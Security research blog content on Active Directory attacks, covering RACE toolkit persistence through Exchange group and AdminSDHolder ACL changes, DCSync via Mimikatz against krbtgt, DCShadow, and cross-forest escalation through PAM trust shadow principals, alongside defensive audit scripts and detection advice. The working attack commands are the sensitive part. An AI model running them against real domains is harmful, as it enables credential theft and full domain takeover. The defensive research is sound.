Persistence using DC - Exchange Groups</h4>
<div style="text-align: justify;">
Exchange creates multiple groups on installation. Groups like Exchange Servers, Exchange Trusted Subsystem and Exchange Windows Permissions have interesting permissions. The groups are added in a new container 'Microsoft Exchange Security Groups'. </div>
<div style="text-align: justify;">
</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
None of the Exchange Groups is a protected group so we can modify their ACLs for persistence.</div>
<div style="text-align: justify;">
Let's target the Exchange Windows Permissions group which has WriteDACL permission on the domain object (or even forest root domain object depending on the installation).</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
In our example, we target the Exchange Windows Permissions group on the forest root powershell.local. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Using DA privileges (on forest root in this case), run the below command to provide labuser WriteDACL permissions on the Exchange Windows Permissions group:</div>
<pre><textarea cols="70" readonly="readonly" rows="2" style="background-color: #012456; color: white;">Set-DCPermissions -Method GroupDACL -DistinguishedName 'CN=Exchange Windows Permissions,OU=Microsoft Exchange Security Groups,DC=powershell,DC=local' -SAMAccountName ops\labuser -Verbose
</textarea></pre>
<div style="text-align: justify;">
Now, as labuser, we modify the ACL of the Exchange Windows Permissions group and add WriteMember rights to labuser. Note that this is just one of the paths once we have WriteDACL on the group:<br />
<pre><textarea cols="70" readonly="readonly" rows="2" style="background-color: #012456; color: white;">Set-ADACL -SamAccountName ops\labuser -DistinguishedName 'CN=Exchange Windows Permissions,OU=Microsoft Exchange Security Groups,DC=powershell,DC=local' -GUIDRight WriteMember -Server powershell.local -Verbose
</textarea></pre>
</div>
Next, add labuser (or a proxy user) to the Exchange Windows Permissions group. Because of this group membership, labuser will have WriteDACL rights on the domain object of the forest root:<br />
<pre><textarea cols="70" readonly="readonly" rows="5" style="background-color: #012456; color: white;">$user = Get-ADUser -Identity labuser
$group = Get-ADGroup -Identity 'Exchange Windows Permissions' -Server powershell.local
Add-ADGroupMember -Identity $group -Members $user -Verbose
</textarea></pre>
Using the WriteDACL rights with labuser, add DCSync rights for labuser:<br />
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">Set-ADACL -SamAccountName ops\labuser -DistinguishedName 'DC=powershell,DC=local' -GUIDRight DCSync -Server ps-dc -Verbose
</textarea></pre>
Finally, run the DCSync attack:<br />
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">Invoke-Mimikatz -Command '"lsadump::dcsync /user:ps\krbtgt /domain:powershell.local"'
</textarea></pre>
<br />
Below is a video of the attack:<br />
<iframe allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen="" frameborder="0" height="315" src="https://www.youtube.com/embed/sySINjLZzwk" width="560"></iframe><br />
<br />
<b>Other well-known techniques implemented in the RACE toolkit are:</b><br />
<br />
<h4 style="text-align: left;">
AdminSDHolder</h4>
<div style="text-align: justify;">
<a href="https://adsecurity.org/?p=1906">ICYMI</a>, the ACL of the AdminSDHolder is overwritten on all Protected Groups by an automatic process called SDProp every 60 minutes. This means any changes we do to the ACL of AdminSDHolder will be propagated to all the Protected Groups too. Therefore, it is a very interesting persistence technique.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Use the below command as DA to add WriteDACL permissions for labuser on AdminSDHolder:</div>
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">Set-DCPermissions -Method AdminSDHolder -SAMAccountName labuser -DistinguishedName 'CN=AdminSDHolder,CN=System,DC=offensiveps,DC=powershell,DC=local' -Verbose
</textarea></pre>
This allows us to push whatever permissions we want on all the Protected Groups as labuser:<br />
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">Set-ADACL -DistinguishedName 'CN=AdminSDHolder,CN=System,DC=offensiveps,DC=powershell,DC=local' -Principal labuser -Right GenericAll -Verbose
</textarea></pre>
<div style="text-align: justify;">
<h4>
DCSync</h4>
The most famous ACL abuse. We can modify the ACL of the domain object to provide DCSync rights to a user we control. Run the below as DA:</div>
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">Set-DCPermissions -Method DCSync -SAMAccountName labuser -DistinguishedName 'DC=offensiveps,DC=powershell,DC=local' -Verbose
</textarea></pre>
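As an added example (not from RACE or the post), the PowerShell below audits the DACLs behind the Exchange Groups, AdminSDHolder and DCSync techniques: for each object it reports ACEs held by principals outside an expected list that grant a control right (GenericAll, GenericWrite, WriteDacl, WriteOwner), one of the replication extended rights, write on the member attribute, or an unscoped ExtendedRight/WriteProperty. It assumes the ActiveDirectory module, the extended-right and attribute GUIDs listed in the code, and that objects in another domain are reached through a separate AD drive created for that domain; the expected-principal list is an assumption to tune for your forest.

```powershell
# Added audit example, not from RACE. Requires the ActiveDirectory module.
function Get-HighValueAceReport {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)][string[]]$DistinguishedName,
        # Domain or DC that holds the objects; when given, a separate AD drive is created for it.
        [string]$Server,
        # Principals expected to hold control or replication rights (assumption: tune per forest).
        [string[]]$ExpectedPrincipals = @('Domain Admins', 'Enterprise Admins', 'Administrators',
                                          'SYSTEM', 'Domain Controllers', 'ENTERPRISE DOMAIN CONTROLLERS',
                                          'ENTERPRISE READ-ONLY DOMAIN CONTROLLERS')
    )
    Import-Module ActiveDirectory -ErrorAction Stop
    $ADR = [System.DirectoryServices.ActiveDirectoryRights]
    $controlMask = [int]($ADR::GenericAll -bor $ADR::GenericWrite -bor $ADR::WriteDacl -bor $ADR::WriteOwner)
    $objectMask  = [int]($ADR::ExtendedRight -bor $ADR::WriteProperty)
    # Extended rights and the attribute the post's Exchange, AdminSDHolder and DCSync steps use.
    $named = @{
        '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes'
        '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes-All'
        '89e95b76-444d-4c62-991a-0facbeda640c' = 'DS-Replication-Get-Changes-In-Filtered-Set'
        'bf9679c0-0de6-11d0-a285-00aa003049e2' = 'member attribute (WriteMember)'
    }

    $drive = 'AD'
    if ($Server) {
        $drive = 'ADAudit'
        $null = New-PSDrive -Name $drive -PSProvider ActiveDirectory -Server $Server -Root ''
    }
    try {
        foreach ($dn in $DistinguishedName) {
            $acl = Get-Acl -Path "${drive}:\$dn"
            foreach ($ace in $acl.Access) {
                if ($ace.AccessControlType -ne 'Allow') { continue }
                $id = $ace.IdentityReference.Value
                if ($ExpectedPrincipals | Where-Object { $id -like "*\$_" }) { continue }
                $rights = [int]$ace.ActiveDirectoryRights
                $guid = $ace.ObjectType.ToString()
                $what = @()
                if (($rights -band $controlMask) -ne 0) {
                    $what += "control right: $($ace.ActiveDirectoryRights)"
                }
                if (($rights -band $objectMask) -ne 0) {
                    if ($named.ContainsKey($guid)) { $what += $named[$guid] }
                    # An empty ObjectType covers every extended right and attribute, DCSync included.
                    elseif ($ace.ObjectType -eq [guid]::Empty) { $what += 'all extended rights / attributes' }
                }
                if ($what.Count -gt 0) {
                    [pscustomobject]@{
                        Object    = $dn
                        Principal = $id
                        Finding   = ($what -join '; ')
                        Inherited = $ace.IsInherited
                    }
                }
            }
        }
    } finally {
        if ($Server) { Remove-PSDrive -Name $drive }
    }
}

# Lab DNs from the post; substitute your own.
Get-HighValueAceReport -DistinguishedName 'DC=offensiveps,DC=powershell,DC=local',
    'CN=AdminSDHolder,CN=System,DC=offensiveps,DC=powershell,DC=local' | Format-Table -AutoSize
Get-HighValueAceReport -Server powershell.local -DistinguishedName 'DC=powershell,DC=local',
    'CN=Exchange Windows Permissions,OU=Microsoft Exchange Security Groups,DC=powershell,DC=local' |
    Format-Table -AutoSize
```

On a domain with Exchange installed the Exchange Windows Permissions group will show up with WriteDacl on the domain object; that is the known default the post builds on, so the question is who can reach that group, not just who is in it.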
<div style="text-align: justify;">
<br />
<h4>
DCShadow</h4>
</div>
<div style="text-align: justify;">
DCShadow provides very useful forest persistence. See <a href="https://www.dcshadow.com/">this</a> and <a href="https://www.labofapenetrationtester.com/2018/04/dcshadow.html">this</a>.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
With DA privileges on the forest root and from a machine joined to the forest root, run the following command to modify the ACLs of multiple objects. This will allow running DCShadow without DA:</div>
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">Set-DCShadowPermissions -FakeDC ops-user1 -SAMAccountName serviceuser -Username labuser -Verbose
</textarea></pre>
<div style="text-align: justify;">
The above command modifies ACLs for:</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The domain object.</div>
<div style="text-align: justify;">
- DS-Install-Replica (Add/Remove Replica in Domain)</div>
<div style="text-align: justify;">
- DS-Replication-Manage-Topology (Manage Replication Topology)</div>
<div style="text-align: justify;">
- DS-Replication-Synchronize (Replication Synchronization)</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The Sites object (and its children) in the Configuration container.</div>
<div style="text-align: justify;">
- CreateChild and DeleteChild</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
</div>
<div style="text-align: justify;">
The object of the computer which is registered as a DC - ops-user1 above.</div>
<div style="text-align: justify;">
- WriteProperty (Not GenericWrite)</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The target object - serviceuser above.</div>
<div style="text-align: justify;">
- WriteProperty (Not GenericWrite)</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
We can now run DCShadow against serviceuser from ops-user1 as labuser. </div>
<br />
<h4 style="text-align: left;">
Previous work</h4>
<div style="text-align: left;">
Directly taken from my talk slides:</div>
<div style="text-align: left;">
- ACL abuse is not something new, system administrators have been using this for so many years!</div>
<div style="text-align: left;">
- We can still see articles <a href="http://active-undelete.com/dcom-configuration.htm">from 2001 talking about setting Launch Permissions for DCOM</a>, for <a href="https://redmondmag.com/articles/2002/02/01/securing-remote-management-with-wmi.aspx">WMI from 2002</a> and so on. </div>
<div style="text-align: left;">
- (French) Chemins de contrôle en environnement Active Directory<br />
<a href="https://www.sstic.org/2014/presentation/chemins_de_controle_active_directory/">https://www.sstic.org/2014/presentation/chemins_de_controle_active_directory/</a></div>
<div style="text-align: left;">
- An ACE Up the Sleeve Designing Active Directory DACL Backdoors (DEF CON 25) <a href="https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEF%20CON%2025%20-%20Andrew-Robbins-and-Will-Schroeder-An-Ace-Up-The-Sleeve.pdf">https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEF%20CON%2025%20-%20Andrew-Robbins-and-Will-Schroeder-An-Ace-Up-The-Sleeve.pdf</a></div>
<br />
<h4 style="text-align: left;">
Defenses</h4>
<div style="text-align: justify;">
Protecting your privileged users is definitely the best defense.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<b>Event logs</b> are also useful for detecting these attacks. While there are almost no logs for ACL changes in the default configuration, we can still use the security logs when someone accesses a target machine: Events 4624 and 4634 for the logon and logoff, and 4672 in case of an admin logon. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
For ACL change logs, configure Auditing for ACL changes. See <a href="https://blogs.technet.microsoft.com/canitpro/2017/03/29/step-by-step-enabling-advanced-security-audit-policy-via-ds-access/">this technet article</a> for guidance. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<b>Regular ACL auditing</b> is also useful in weeding out unnecessary or malicious ACEs. We can use tools like <a href="https://github.com/BloodHoundAD/BloodHound">BloodHound</a>, <a href="https://github.com/canix1/ADACLScanner">ADACLScanner</a> and <a href="https://github.com/vletoux/pingcastle">PingCastle</a> for that. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
A project I created, <b><a href="https://github.com/samratashok/Deploy-Deception">Deploy-Deception</a></b>, can be used to create accounts which have misconfigured ACLs and have verbose logging enabled. It is useful for tricking an attacker into assuming they have found object(s) with misconfigured ACLs.</div>
<br />
<h4 style="text-align: left;">
Future Work</h4>
Directly taken from my talk slides:<br />
<br />
- Service Permissions are stored in Registry. So, that is a place ripe for abuse.<br />
- As noted earlier, WMI Permanent Event Consumer needs to be explored more.<br />
- For the RACE toolkit, work on hiding the ACE we introduce is highly desirable. Also, implementation of more Registry Autoruns! Currently, Remove option does not work for multiple functions. <br />
<br />
That is all! Hope you like it!</div>
<br />
<br />
Slides of the DEF CON 27 talk:<br />
<iframe allowfullscreen="" frameborder="0" height="485" marginheight="0" marginwidth="0" scrolling="no" src="//www.slideshare.net/slideshow/embed_code/key/LJXFDZ4KebYcnK" style="border-width: 1px; border: 1px solid #ccc; margin-bottom: 5px; max-width: 100%;" width="595"> </iframe> <br />
<div style="margin-bottom: 5px;">
<b> <a href="https://www.slideshare.net/nikhil_mittal/race-minimal-rights-and-ace-for-active-directory-dominance" target="_blank" title="RACE - Minimal Rights and ACE for Active Directory Dominance">RACE - Minimal Rights and ACE for Active Directory Dominance</a> </b> from <b><a href="https://www.slideshare.net/nikhil_mittal" target="_blank">Nikhil Mittal</a></b> </div>
<br />
<br />
<br />
<br /></div>
How NOT to use the PAM trust - Leveraging Shadow Principals for Cross Forest Attacks (Nikhil "SamratAshok" Mittal, 2019-04-18)<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: justify;">
I did a super interesting AD security assessment for a client recently. They are re-deploying their infrastructure and upgrading their forest(s) to Server 2016 Functional Level. There are so many interesting things which we did during the assessment but the most interesting for me was their attempt to establish Privileged Access Management (PAM) trust in an "interesting" way. It is a classic example of deploying something which sounds secure without actually understanding what it does. </div>
<div style="text-align: justify;">
<br />
Microsoft <a href="https://docs.microsoft.com/en-us/windows-server/identity/whats-new-active-directory-domain-services#a-namebkmkpamaprivileged-access-management">introduced</a> Privileged Access Management (PAM) with Server 2016. Among other things, it has very interesting features like -<br />
- A bastion forest (Think the administrative forest in <a href="https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access-reference-material#ESAE_BM">ESAE</a> or the famous Red Forest)<br />
- Shadow security principals<br />
- Temporary group membership (Add a user to a group with time-to-live (TTL))<br />
<br />
<h3>
</h3>
<h4>
So what is PAM? </h4>
<br />
PAM has been discussed in much detail <a href="https://www.petri.com/windows-server-2016-set-privileged-access-management">here by Russel</a> and <a href="https://blogs.technet.microsoft.com/389thoughts/2017/06/19/ad-2016-pam-trust-how-it-works-and-safety-advisory/">here by Willem</a>. Please read them to understand what PAM has to offer. A quick explanation is below:<br />
<br />
In a perfect world, PAM enables managing an existing production/user forest using a bastion forest which has a one-way PAM trust with the existing forest. The users in the bastion forest can be 'mapped' to privileged groups like Domain Admins and Enterprise Admins in the user forest without modifying any group memberships or ACLs. This is done by creating shadow security principals in the bastion forest, which are mapped to the SIDs of high privilege groups in the user forest, and then adding users from the admin forest as members of the shadow security principals.<br />
<br />
<h4>
Example</h4>
<br />
Let's have a look at an example. We have powershell.local as our user forest and bastion.local as the bastion or admin forest. What we want is to be able to manage powershell.local from bastion.local without modifying any group membership or ACLs on powershell.local.<br />
<br />
A one-way PAM trust can be established between the two forests using the commands below (taken from the Petri article linked above):<br />
On user forest (powershell.local in our example) -<br />
<pre><textarea cols="70" readonly="readonly" rows="13" style="background-color: black; color: white;">netdom trust powershell.local /Domain:bastion.local /Add /UserD:administrator@bastion.local /PasswordD:Password@123 /UserO:administrator@powershell.local /PasswordO:Password@123
netdom trust powershell.local /domain:bastion.local /ForestTransitive:Yes
netdom trust powershell.local /domain:bastion.local /EnableSIDHistory:Yes
netdom trust powershell.local /domain:bastion.local /EnablePIMTrust:Yes
netdom trust powershell.local /domain:bastion.local /Quarantine:No
</textarea></pre>
On bastion forest -<br />
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: black; color: white;">netdom trust bastion.local /domain:powershell.local /ForestTransitive:Yes
</textarea></pre>
Shadow principals reside in a special container, 'CN=Shadow Principal Configuration,CN=Services', under the Configuration container of the bastion forest. We can create shadow security principals on bastion.local using the below PowerShell code:<br />
<pre><textarea cols="70" readonly="readonly" rows="10" style="background-color: #012456; color: white;"># Get the SID for the Enterprise Admins group of the existing forest
$ShadowPrincipalSid = (Get-ADGroup -Identity 'Enterprise Admins' -Properties ObjectSID -Server powershell.local).ObjectSID
# Container location
$Container = 'CN=Shadow Principal Configuration,CN=Services,CN=Configuration,DC=bastion,DC=local'
# Create the Shadow principal - note the type
New-ADObject -Type msDS-ShadowPrincipal -Name "psforest-ShadowEnterpriseAdmin" -Path $Container -OtherAttributes @{'msDS-ShadowPrincipalSid'= $ShadowPrincipalSid}
</textarea></pre>
In the above command we are mapping the SID of Enterprise Admins group of the user forest powershell.local to a Shadow security principal "psforest-ShadowEnterpriseAdmin". Please note that we can also map the shadow principal to a user in the user forest.<br />
<br />
Next, add a principal from the bastion forest as a member of the shadow principal. Here we add the bastion forest's Administrator, which gives that account Enterprise Admins privileges in powershell.local:<br />
<pre><textarea cols="70" readonly="readonly" rows="3" style="background-color: #012456; color: white;"># Add the DA of bastion forest to shadow principals thus providing Enterprise Admins privileges on existing forest
Set-ADObject -Identity "CN=psforest-ShadowEnterpriseAdmin,CN=Shadow Principal Configuration,CN=Services,CN=Configuration,DC=bastion,DC=local" -Add @{'member'="CN=Administrator,CN=Users,DC=bastion,DC=local"} -Verbose
</textarea></pre>
Now, it is possible to manage powershell.local forest from bastion.local without making any changes in the group memberships or ACLs on powershell.local.<br />
<br />
This looks great! It takes away the administrative overhead of managing groups and ACLs across forests and reduces the chances of credential-based lateral movement techniques like OverPTH, PTT and credential relay.<br />
<br />
Now, there is something worth noticing about the above setup. To be able to use the shadow security principals, we had to enable SIDHistory on the PAM trust and set Quarantine to No, which means no <a href="https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2003/cc755321(v=ws.10)#sid-filtering">SID Filtering</a> on the trust. We will see in the next section how dangerous this is if the bastion forest is not set up properly.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<h4>
The Misconfiguration</h4>
</div>
<div style="text-align: justify;">
Let's get back to the scenario I saw during the assessment. The client had enabled PAM, but they were using a forest in production (not a separate bastion or admin forest) to manage their other forests. The forest used to manage the others was located at their headquarters, and the forests for their sites across the country were managed from it. Kudos to them for having separate forests for different locations :)<br />
<br />
They were sold on the idea that using PAM would protect against credential-based attacks: no logon using credentials from the bastion forest to any other forest.<br />
<br />
But a PAM trust where the bastion forest is not isolated is disastrous. Why? Because if we compromise the bastion forest we get high privileges (Enterprise Admins or Domain Admins) in the other forest. And:<br />
- There is no group membership (unlike Foreign Security Principals)<br />
- No ACLs modification<br />
- AFAIK, no other modification to look for in the forest which gets compromised!<br />
<br />
Let's have a look at an example. Following is the setup in my lab (diagram built using draw.io):<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj27jSOEr8tKHCVpp1bNkJ4I35mXqAUJJRRlodK4nBisYU1VzFkRSf6M1kipT2Qhjf32-CGPTY4iTKSFRSBCB0fG3OMkza3jyS-BlZy_fi7DWCrExYEkOzs-rWbKAOhg2Jjpn9dbyhDH2I/s1600/PAM+%25281%2529.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="184" data-original-width="779" height="127" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj27jSOEr8tKHCVpp1bNkJ4I35mXqAUJJRRlodK4nBisYU1VzFkRSf6M1kipT2Qhjf32-CGPTY4iTKSFRSBCB0fG3OMkza3jyS-BlZy_fi7DWCrExYEkOzs-rWbKAOhg2Jjpn9dbyhDH2I/s640/PAM+%25281%2529.png" width="550" /></a></div>
defensiveps.local is the bastion forest and powershell.local is the user/production forest.<br />
<br />
<h4>
Abusing the PAM trust</h4>
<br />
Here is how to identify and approach abusing a PAM trust:<br />
<br />
<b>Enumeration</b><br />
<br />
First, let's enumerate whether our current forest has a PAM trust with any other forest, that is, whether our current forest can access another forest without SID Filtering getting in the way.<br />
<br />
Using the <a href="https://github.com/samratashok/ADModule">ADModule</a>, we can simply run Get-ADTrust and look for a trust which has ForestTransitive set to True and SIDFilteringQuarantined set to False, i.e. SID Filtering quarantine is not set on the trust. Note that a plain forest trust shows the same two values by default, so treat this as a hint and confirm by enumerating the shadow principals as shown below.<br />
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">Get-ADTrust -Filter {(ForestTransitive -eq $True) -and (SIDFilteringQuarantined -eq $False)}
</textarea></pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7KJR65vR6_rke_sVn2rGrao9u0-NFWDpAJlWzgCaQALdIoT2e_JHJy64-oUdcQumOuOF5bxw59E7wCcssoW03dJ5YH4XCHXvlLNhKZv3W9Q0qKHyxRzJFGcwPLvlwFpVEz5FBBusTlok/s1600/Enumerate_PAM_AD.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="824" data-original-width="1600" height="205" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7KJR65vR6_rke_sVn2rGrao9u0-NFWDpAJlWzgCaQALdIoT2e_JHJy64-oUdcQumOuOF5bxw59E7wCcssoW03dJ5YH4XCHXvlLNhKZv3W9Q0qKHyxRzJFGcwPLvlwFpVEz5FBBusTlok/s400/Enumerate_PAM_AD.png" width="400" /></a></div>
<br />
PowerView (dev branch) decodes TrustAttributes into flag names for you, but it has no explicit SID Filtering field. On the bastion forest's side the trust object only carries FOREST_TRANSITIVE (the PAM-specific flags are set on the user forest's side by the netdom commands above), so its output there does not tell you whether SID Filtering is disabled on the other side.<br />
<br />
On the other hand, if you want to enumerate whether your current forest is managed by a bastion forest (Blue Teams take note), look for ForestTransitive set to True and SIDFilteringForestAware set to True. In this case, <a href="https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-adts/e9a2d23c-c31e-4a6f-88a0-6646fdb51a3c">TrustAttributes</a> is also a very good indicator: the PIM_TRUST bit is 0x00000400 (1024 in decimal). Combined with TREAT_AS_EXTERNAL (0x40, the bit behind SIDFilteringForestAware) and FOREST_TRANSITIVE (0x8), the value is 1096 for PAM + External Trust + Forest Transitive.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitdM8nTXT7_t6t4oD5gFToSFvrIb2XbuBF7nhMy9yMapilJFnZYHab14UqD4g2w-uZ2Ls4EB5Cn-B_ZTwWoSydM3yN9LJJR9xsqA8hifYDR4u61dXk6IdtLAPvpRXximVirCO1_fsfFhI/s1600/Enumerate_PAM_Production_AD.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="491" data-original-width="1310" height="148" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitdM8nTXT7_t6t4oD5gFToSFvrIb2XbuBF7nhMy9yMapilJFnZYHab14UqD4g2w-uZ2Ls4EB5Cn-B_ZTwWoSydM3yN9LJJR9xsqA8hifYDR4u61dXk6IdtLAPvpRXximVirCO1_fsfFhI/s400/Enumerate_PAM_Production_AD.png" width="400" /></a></div>
In this case (when run from the user/production forest), PowerView (dev) shows that PIM Trust is enabled. <br />
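As an added example (not part of the original post), here is a small PowerShell decoder for the trustAttributes bitmask, so that the 1096 and 8 seen on the two sides of the lab trust can be read as flag names instead of remembered as numbers. The flag values are the ones documented in MS-ADTS for trustAttributes; the Get-ADTrust pipeline at the end assumes the ActiveDirectory module is loaded.

```powershell
# Added example: decode a trustedDomain object's trustAttributes value into flag names.
# Flag values from MS-ADTS (trustAttributes). The comments show which Get-ADTrust
# boolean property each bit is surfaced as.
$TrustAttributeFlags = [ordered]@{
    0x00000001 = 'NON_TRANSITIVE'
    0x00000002 = 'UPLEVEL_ONLY'
    0x00000004 = 'QUARANTINED_DOMAIN'                      # Get-ADTrust: SIDFilteringQuarantined
    0x00000008 = 'FOREST_TRANSITIVE'                       # Get-ADTrust: ForestTransitive
    0x00000010 = 'CROSS_ORGANIZATION'
    0x00000020 = 'WITHIN_FOREST'
    0x00000040 = 'TREAT_AS_EXTERNAL'                       # Get-ADTrust: SIDFilteringForestAware
    0x00000080 = 'USES_RC4_ENCRYPTION'
    0x00000200 = 'CROSS_ORGANIZATION_NO_TGT_DELEGATION'
    0x00000400 = 'PIM_TRUST'
    0x00000800 = 'CROSS_ORGANIZATION_ENABLE_TGT_DELEGATION'
}

function ConvertFrom-TrustAttributes {
    param([Parameter(Mandatory)][int]$Value)
    $names = foreach ($bit in $TrustAttributeFlags.Keys) {
        if ($Value -band $bit) { $TrustAttributeFlags[$bit] }
    }
    [pscustomobject]@{
        Value    = $Value
        Flags    = ($names -join ',')
        PIMTrust = [bool]($Value -band 0x400)
        # SIDHistory can only flow over the trust when TREAT_AS_EXTERNAL is set and
        # QUARANTINED_DOMAIN is clear, which is exactly what the netdom commands above did.
        SIDHistoryAllowed = ([bool]($Value -band 0x40)) -and (-not ($Value -band 0x4))
    }
}

# The two values from the lab: 1096 on the user forest's side of the trust,
# 8 on the bastion forest's side (forest transitive only).
ConvertFrom-TrustAttributes -Value 1096
ConvertFrom-TrustAttributes -Value 8

# Against a live domain: decode every trust object the current forest knows about.
# Get-ADTrust -Filter * -Properties trustAttributes |
#     ForEach-Object { ConvertFrom-TrustAttributes -Value $_.trustAttributes |
#         Select-Object @{n='Trust';e={$_.Name}},Value,Flags,PIMTrust,SIDHistoryAllowed }
```

Run from the user forest, the 1096 entry decodes to FOREST_TRANSITIVE, TREAT_AS_EXTERNAL and PIM_TRUST with SIDHistoryAllowed True; run from the bastion forest, the 8 entry shows nothing beyond FOREST_TRANSITIVE, which is why the bastion side alone cannot tell you whether the other forest filters SIDs.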
<br />
Next, let's enumerate the shadow security principals, their members from the current (bastion) forest and the privileges they map to in the user/production forest. We can use the following command from the ActiveDirectory module:</div>
<pre><textarea cols="70" readonly="readonly" rows="3" style="background-color: #012456; color: white;">Get-ADObject -SearchBase ("CN=Shadow Principal Configuration,CN=Services," + (Get-ADRootDSE).configurationNamingContext) -Filter * -Properties * | select Name,member,msDS-ShadowPrincipalSid | fl
</textarea></pre>
<div style="text-align: justify;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYg_PRj7fCXzzruYhcCEf0cEo8Qg37G1pq2x2K0lpL0fFvP8DuG5r_fokdE-7MEA_A-mCR1mgBBy_ZVh1kxdkLobDwYv5PiOvseNLbkVU3fFDr8YMLOvIdDZ8gcdBAcSIt1V9N5hSsTOU/s1600/Enumerate_SSP_Privs.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="416" data-original-width="1600" height="103" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYg_PRj7fCXzzruYhcCEf0cEo8Qg37G1pq2x2K0lpL0fFvP8DuG5r_fokdE-7MEA_A-mCR1mgBBy_ZVh1kxdkLobDwYv5PiOvseNLbkVU3fFDr8YMLOvIdDZ8gcdBAcSIt1V9N5hSsTOU/s400/Enumerate_SSP_Privs.png" width="400" /></a></div>
As is clear in the above screenshot, we look for shadow security principals in the special container 'CN=Shadow Principal Configuration,CN=Services' under the Configuration container of the bastion forest. The following properties are the most interesting ones:<br />
<br />
- <b>Name</b> - Name of the shadow principal<br />
<br />
- <b>member</b> - Members from the bastion forest which are mapped to the shadow principal. In our example, it is the Domain Administrator of defensiveps.local.<br />
<br />
- <b>msDS-ShadowPrincipalSid</b> - The SID of the principal (user or group) in the user/production forest whose privileges are assigned to the shadow security principal. In our example, it is the Enterprise Admins group in the user forest.<br />
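The one-liner above prints raw SIDs and DNs. As an added example (not part of the original post), the function below resolves each shadow principal to the object it impersonates in the user forest and to readable bastion-forest member names, which is what you actually want to read off during an assessment. It assumes the ActiveDirectory module is loaded, that you run it from the bastion forest, and that the trust lets you query the user forest (the -UserForest value is the lab's powershell.local):

```powershell
# Added example: map every shadow principal in the bastion forest to what it grants
# in the user forest and who in the bastion forest holds it.
function Get-ShadowPrincipalMapping {
    param(
        # DNS name of the user/production forest the shadow SIDs belong to
        [Parameter(Mandatory)][string]$UserForest
    )
    $container = 'CN=Shadow Principal Configuration,CN=Services,' + (Get-ADRootDSE).configurationNamingContext

    Get-ADObject -SearchBase $container -SearchScope OneLevel -Filter * -Properties member,'msDS-ShadowPrincipalSid' |
        ForEach-Object {
            $sid = $_.'msDS-ShadowPrincipalSid'

            # Resolve the SID to the group or user it represents in the user forest.
            # A failure here usually means the trust does not allow the query, not that the SID is bogus.
            $target = $null
            try {
                $target = Get-ADObject -Server $UserForest -Filter "objectSid -eq '$sid'" -Properties objectClass
            } catch { }

            # Resolve each member DN (bastion forest) to its sAMAccountName.
            $members = foreach ($dn in $_.member) {
                (Get-ADObject -Identity $dn -Properties sAMAccountName).sAMAccountName
            }

            [pscustomobject]@{
                ShadowPrincipal = $_.Name
                MapsToSid       = $sid.Value
                MapsTo          = if ($target) { "$($target.Name) ($($target.objectClass))" } else { '<unresolved>' }
                BastionMembers  = ($members -join ', ')
            }
        }
}

Get-ShadowPrincipalMapping -UserForest powershell.local | Format-List
```

In the lab this returns one row: psforest-ShadowEnterpriseAdmin, mapped to the Enterprise Admins group of powershell.local, with the bastion forest's Administrator as its only member. Every name listed under BastionMembers is a target whose compromise yields the mapped privileges in the user forest.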
<br />
<b>Using the shadow principals </b><br />
<br />
Now, if we compromise a user listed in "member" above, we can use the shadow principal. In our example, we need to compromise the Administrator user of the defensiveps.local forest and then we will have Enterprise Admins privileges on the powershell.local forest!<br />
